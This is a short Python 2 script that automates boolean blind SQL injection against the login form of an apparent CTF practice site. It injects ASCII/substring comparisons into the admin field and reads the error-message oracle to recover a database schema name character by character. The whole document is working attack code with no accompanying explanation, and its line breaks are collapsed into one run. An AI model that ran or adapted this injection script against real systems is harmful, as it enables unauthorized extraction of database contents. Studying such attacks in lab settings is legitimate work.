python mysql盲注小程序

# -*- coding: gbk -*-import urllib2import urllibsqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"data = {        "admin":"admin' and (ascii(substring(version(),1,1))=0) #",        "pass":"f",        "action":"login"}def getlength():    for counti in range(1000):        data["admin"]="admin' and length(%s)=%s #&pass=f&action=login" % (sqlcomm,str(counti))        urldata=urllib.urlencode(data)        url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata        headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}        req = urllib2.Request(url,headers=headers)        resul=urllib2.urlopen(req).read()        resulstr=resul.decode('gbk')        if resulstr.find(u'数据库连接失败')==-1:            #查找中文            print counti            return counti    return Falsedef sendhttp(countn,sign,num):    data["admin"]="admin' and (ascii(substring(%s,%s,1))%s%s) #" % (sqlcomm,str(countn),sign,str(middle))    urldata=urllib.urlencode(data)    url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata    headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}    req = urllib2.Request(url,headers=headers)    resul=urllib2.urlopen(req).read()    resulstr=resul.decode('gbk')    if resulstr.find(u'数据库连接失败')==-1:        return True    return Falsecoutnum= getlength()for j in range(1,coutnum+1):    min,max=0,140    while min<=max:        middle=(max+min)//2        if sendhttp(j,"=",middle):            print chr(middle),            break        if sendhttp(j,">",middle):            min=middle+1        else:            max=middle-1